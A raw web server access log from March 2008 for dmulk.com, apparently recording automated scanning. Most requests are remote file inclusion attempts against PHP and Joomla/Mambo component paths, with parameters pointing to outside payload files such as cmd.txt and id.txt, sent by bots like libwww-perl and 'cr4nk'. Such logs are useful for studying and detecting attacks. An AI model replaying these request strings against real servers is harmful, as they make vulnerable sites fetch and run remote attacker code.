217.169.46.98 - - [02/Mar/2008:08:39:06 -0800] "GET /logs/modules/postguestbook/styles/internal/header.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
208.109.123.107 - - [02/Mar/2008:08:39:16 -0800] "GET /errors.php?error=http://www.fm24forum.de/update/fissh/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
67.195.44.108 - - [02/Mar/2008:08:39:17 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.44.86 - - [02/Mar/2008:08:39:17 -0800] "GET /logs/access_080103.log HTTP/1.0" 200 448825 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.9.159.178 - - [02/Mar/2008:08:39:56 -0800] "GET /errors.php?error=http://shadowstargames.com/test.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
72.9.159.178 - - [02/Mar/2008:08:39:57 -0800] "GET /logs/errors.php?error=http://shadowstargames.com/test.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
80.249.117.99 - - [02/Mar/2008:08:40:53 -0800] "GET /logs/access_080124.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.fm24forum.de/update/fissh/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
80.249.117.99 - - [02/Mar/2008:08:40:53 -0800] "GET /logs/access_080124.log/errors.php?error=http://www.fm24forum.de/update/fissh/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
64.147.163.85 - - [02/Mar/2008:08:41:31 -0800] "GET /logs/access_080119.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.camino-books.com/images/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.147.163.85 - - [02/Mar/2008:08:41:37 -0800] "GET /logs/access_071219.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.camino-books.com/images/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.147.163.85 - - [02/Mar/2008:08:41:37 -0800] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.camino-books.com/images/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.147.163.85 - - [02/Mar/2008:08:41:37 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.camino-books.com/images/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.147.163.85 - - [02/Mar/2008:08:42:11 -0800] "GET /logs/access_071212.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.camino-books.com/images/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.109.123.107 - - [02/Mar/2008:08:42:52 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.fm24forum.de/update/fissh/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
208.109.123.107 - - [02/Mar/2008:08:42:53 -0800] "GET /errors.php?error=http://www.fm24forum.de/update/fissh/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
62.149.36.33 - - [02/Mar/2008:08:43:01 -0800] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.149.36.33 - - [02/Mar/2008:08:43:01 -0800] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.188.66.23 - - [02/Mar/2008:08:43:12 -0800] "GET /logs/access_080207.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://claroline.lct-net.cl/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.179.41.165 - - [02/Mar/2008:08:43:13 -0800] "GET /logs/access_080216.log//faqsupport/samplefaqsupport.php?path[docroot]=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.169.46.98 - - [02/Mar/2008:08:43:13 -0800] "GET /logs/access_080207.log/modules/postguestbook/styles/internal/header.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
212.179.41.165 - - [02/Mar/2008:08:43:15 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.191.16.14 - - [02/Mar/2008:08:43:16 -0800] "GET /logs/access_080107.log//forum/auth/auth.php?phpbb_root_path=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.179.41.165 - - [02/Mar/2008:08:43:17 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.191.16.14 - - [02/Mar/2008:08:43:23 -0800] "GET //forum/auth/auth.php?phpbb_root_path=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.191.16.14 - - [02/Mar/2008:08:43:30 -0800] "GET /logs//forum/auth/auth.php?phpbb_root_path=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.60.6 - - [02/Mar/2008:08:44:34 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://rafb.net/p/oQh6dE84.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
212.227.60.6 - - [02/Mar/2008:08:44:34 -0800] "GET /logs/access_071231.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://rafb.net/p/oQh6dE84.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
212.227.60.6 - - [02/Mar/2008:08:44:34 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://rafb.net/p/oQh6dE84.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
82.66.124.141 - - [02/Mar/2008:08:44:36 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
82.66.124.141 - - [02/Mar/2008:08:44:37 -0800] "GET //admin/business_inc/saveserver.php?thisdir=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
221.143.48.95 - - [02/Mar/2008:08:44:58 -0800] "GET /order.php?pag=http://www.geocities.com/tomohonhack1/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
221.143.48.95 - - [02/Mar/2008:08:44:59 -0800] "GET /logs/order.php?pag=http://www.geocities.com/tomohonhack1/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
211.233.7.68 - - [02/Mar/2008:08:45:12 -0800] "GET /logs/order.php?pag=http://www.geocities.com/tomohonhack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
211.233.7.68 - - [02/Mar/2008:08:45:12 -0800] "GET /order.php?pag=http://www.geocities.com/tomohonhack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.93.107.242 - - [02/Mar/2008:08:45:42 -0800] "GET /logs/access_080207.log//xonia//skin/zero_vote/ask_password.php?dir=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [02/Mar/2008:08:45:42 -0800] "GET //xonia//skin/zero_vote/ask_password.php?dir=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [02/Mar/2008:08:45:42 -0800] "GET /logs//xonia//skin/zero_vote/ask_password.php?dir=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.9.176.178 - - [02/Mar/2008:08:45:43 -0800] "GET /logs/access_080207.log//xonia//skin/zero_vote/ask_password.php?dir=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.9.176.178 - - [02/Mar/2008:08:45:43 -0800] "GET //xonia//skin/zero_vote/ask_password.php?dir=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.9.176.178 - - [02/Mar/2008:08:45:43 -0800] "GET /logs//xonia//skin/zero_vote/ask_password.php?dir=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.9.159.178 - - [02/Mar/2008:08:46:00 -0800] "GET /logs/errors.php?error=http://shadowstargames.com/test.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
72.9.159.178 - - [02/Mar/2008:08:46:00 -0800] "GET /errors.php?error=http://shadowstargames.com/test.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
62.149.36.33 - - [02/Mar/2008:08:46:08 -0800] "GET /logs/access_080121.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.9.176.178 - - [02/Mar/2008:08:46:30 -0800] "GET /logs/access_071224.log//xonia//skin/zero_vote/ask_password.php?dir=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.93.107.242 - - [02/Mar/2008:08:46:31 -0800] "GET /logs/access_071224.log//xonia//skin/zero_vote/ask_password.php?dir=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.109.123.107 - - [02/Mar/2008:08:46:46 -0800] "GET /logs/access_080201.log/errors.php?error=http://www.fm24forum.de/update/fissh/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
208.109.123.107 - - [02/Mar/2008:08:46:52 -0800] "GET /errors.php?error=http://www.fm24forum.de/update/fissh/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
208.109.123.107 - - [02/Mar/2008:08:46:57 -0800] "GET /logs/errors.php?error=http://www.fm24forum.de/update/fissh/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
74.6.28.79 - - [02/Mar/2008:08:47:14 -0800] "GET /bikes/?S=A HTTP/1.0" 200 2168 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
82.66.124.141 - - [02/Mar/2008:08:47:30 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
216.191.16.11 - - [02/Mar/2008:08:48:37 -0800] "GET /logs/access_080208.log/stats/modules/My_eGallery/index.php?basepath=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.191.16.11 - - [02/Mar/2008:08:48:38 -0800] "GET /stats/modules/My_eGallery/index.php?basepath=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.191.16.11 - - [02/Mar/2008:08:48:38 -0800] "GET /logs/stats/modules/My_eGallery/index.php?basepath=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.29.89.114 - - [02/Mar/2008:08:48:50 -0800] "GET /config.inc.php?path_escape=http://shadowstargames.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
72.29.89.114 - - [02/Mar/2008:08:48:53 -0800] "GET /logs/config.inc.php?path_escape=http://shadowstargames.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
81.169.171.5 - - [02/Mar/2008:08:48:58 -0800] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.greytauctions.org/panji_tengkorak/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.171.5 - - [02/Mar/2008:08:48:59 -0800] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.greytauctions.org/panji_tengkorak/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.171.5 - - [02/Mar/2008:08:48:59 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.greytauctions.org/panji_tengkorak/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.20.24 - - [02/Mar/2008:08:49:01 -0800] "GET /funny/ HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
62.149.36.33 - - [02/Mar/2008:08:49:29 -0800] "GET /logs/access_080216.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
196.35.158.180 - - [02/Mar/2008:08:50:01 -0800] "GET /logs/access_080216.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
196.35.158.180 - - [02/Mar/2008:08:50:20 -0800] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.144.182 - - [02/Mar/2008:08:50:32 -0800] "GET /////////?mosConfig_absolute_path=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 200 3101 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
85.25.144.182 - - [02/Mar/2008:08:50:37 -0800] "GET /logs/////////?mosConfig_absolute_path=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 200 36986 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
216.191.16.11 - - [02/Mar/2008:08:51:32 -0800] "GET /logs/access.log/stats/modules/My_eGallery/index.php?basepath=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.175.249.95 - - [02/Mar/2008:08:52:00 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.pfarrgemeinde-schneeberg.de/.js/n? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.175.249.95 - - [02/Mar/2008:08:52:00 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.pfarrgemeinde-schneeberg.de/.js/n? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.135.210.75 - - [02/Mar/2008:08:52:43 -0800] "GET /logs/access_080122.log/errors.php?error=http://www.barrypostma.com/cp/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.135.210.75 - - [02/Mar/2008:08:52:44 -0800] "GET /errors.php?error=http://www.barrypostma.com/cp/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.135.210.75 - - [02/Mar/2008:08:52:44 -0800] "GET /logs/errors.php?error=http://www.barrypostma.com/cp/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.212.164.34 - - [02/Mar/2008:08:52:55 -0800] "GET /logs/access_071212.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://usuarios.lycos.es/arquivos/cmdAsc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.212.164.34 - - [02/Mar/2008:08:52:55 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://usuarios.lycos.es/arquivos/cmdAsc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.212.164.34 - - [02/Mar/2008:08:52:55 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://usuarios.lycos.es/arquivos/cmdAsc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.227.60.6 - - [02/Mar/2008:08:53:03 -0800] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://rafb.net/p/oQh6dE84.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
212.227.60.6 - - [02/Mar/2008:08:53:04 -0800] "GET /logs/access_080118.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://rafb.net/p/oQh6dE84.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
212.227.96.89 - - [02/Mar/2008:08:53:30 -0800] "GET /////////?mosConfig_absolute_path=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 200 3101 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
212.227.96.89 - - [02/Mar/2008:08:53:32 -0800] "GET /logs/////////?mosConfig_absolute_path=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 200 36986 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
67.212.164.34 - - [02/Mar/2008:08:53:50 -0800] "GET /logs/access.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://usuarios.lycos.es/arquivos/cmdAsc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.61.196.190 - - [02/Mar/2008:08:54:18 -0800] "GET /logs/access.log/index.php?pag=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.144.182 - - [02/Mar/2008:08:54:37 -0800] "GET /////////?mosConfig_absolute_path=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 200 3101 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
85.25.144.182 - - [02/Mar/2008:08:54:37 -0800] "GET /logs/////////?mosConfig_absolute_path=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 200 36986 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
193.188.66.23 - - [02/Mar/2008:08:54:51 -0800] "GET /logs/access_080131.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.camino-books.com/images/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.188.66.23 - - [02/Mar/2008:08:54:52 -0800] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.camino-books.com/images/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.188.66.23 - - [02/Mar/2008:08:54:52 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.camino-books.com/images/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.239.78.91 - - [02/Mar/2008:08:54:54 -0800] "GET //main.php?s=http://ljmirco.com.ar/id.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.61.196.190 - - [02/Mar/2008:08:54:54 -0800] "GET /logs/access.log/index.php?pag=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.160.88 - - [02/Mar/2008:08:54:55 -0800] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://dominic888.no-ip.info:8081/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
65.99.202.130 - - [02/Mar/2008:08:54:58 -0800] "GET /logs//claroline/tracking/userLog.php?rootSys=http://www.freewebtown.com/pacos/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
65.99.202.130 - - [02/Mar/2008:08:54:58 -0800] "GET //claroline/tracking/userLog.php?rootSys=http://www.freewebtown.com/pacos/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
65.99.202.130 - - [02/Mar/2008:08:54:58 -0800] "GET //claroline/tracking/userLog.php?rootSys=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
65.99.202.130 - - [02/Mar/2008:08:54:58 -0800] "GET /logs//claroline/tracking/userLog.php?rootSys=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
65.99.202.130 - - [02/Mar/2008:08:54:58 -0800] "GET /logs//claroline/tracking/userLog.php?rootSys=http://www.freewebtown.com/pacos/test.txt?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
65.99.202.130 - - [02/Mar/2008:08:54:58 -0800] "GET //claroline/tracking/userLog.php?rootSys=http://www.freewebtown.com/pacos/test.txt?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
61.19.30.146 - - [02/Mar/2008:08:55:28 -0800] "GET /logs/access.log/index.php?pagina=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
196.35.158.180 - - [02/Mar/2008:08:55:31 -0800] "GET /logs/access_080208.log/pivot/modules/module_db.php?pivot_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
196.35.158.180 - - [02/Mar/2008:08:55:39 -0800] "GET /pivot/modules/module_db.php?pivot_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.194.173.64 - - [02/Mar/2008:08:55:40 -0800] "GET /logs//claroline/tracking/userLog.php?rootSys=http://www.freewebtown.com/pacos/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
213.194.173.64 - - [02/Mar/2008:08:55:40 -0800] "GET /logs//claroline/tracking/userLog.php?rootSys=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
213.194.173.64 - - [02/Mar/2008:08:55:41 -0800] "GET /logs//claroline/tracking/userLog.php?rootSys=http://www.freewebtown.com/pacos/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
213.194.173.64 - - [02/Mar/2008:08:55:41 -0800] "GET //claroline/tracking/userLog.php?rootSys=http://www.freewebtown.com/pacos/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
213.194.173.64 - - [02/Mar/2008:08:55:41 -0800] "GET //claroline/tracking/userLog.php?rootSys=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
213.194.173.64 - - [02/Mar/2008:08:55:42 -0800] "GET //claroline/tracking/userLog.php?rootSys=http://www.freewebtown.com/pacos/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
196.35.158.180 - - [02/Mar/2008:08:55:47 -0800] "GET /logs/pivot/modules/module_db.php?pivot_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.66.124.141 - - [02/Mar/2008:08:56:39 -0800] "GET /logs/access_080211.log//admin/business_inc/saveserver.php?thisdir=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
74.6.23.213 - - [02/Mar/2008:08:56:39 -0800] "GET /logs/access_080226.log HTTP/1.0" 200 786432 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
82.66.124.141 - - [02/Mar/2008:08:56:40 -0800] "GET //admin/business_inc/saveserver.php?thisdir=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
82.66.124.141 - - [02/Mar/2008:08:56:40 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
77.221.130.8 - - [02/Mar/2008:08:56:43 -0800] "GET /logs/access_080216.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.formula.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.8 - - [02/Mar/2008:08:56:44 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.formula.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.8 - - [02/Mar/2008:08:56:44 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.formula.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.29.89.114 - - [02/Mar/2008:08:56:45 -0800] "GET /config.inc.php?path_escape=http://shadowstargames.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
72.29.89.114 - - [02/Mar/2008:08:56:45 -0800] "GET /logs/config.inc.php?path_escape=http://shadowstargames.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
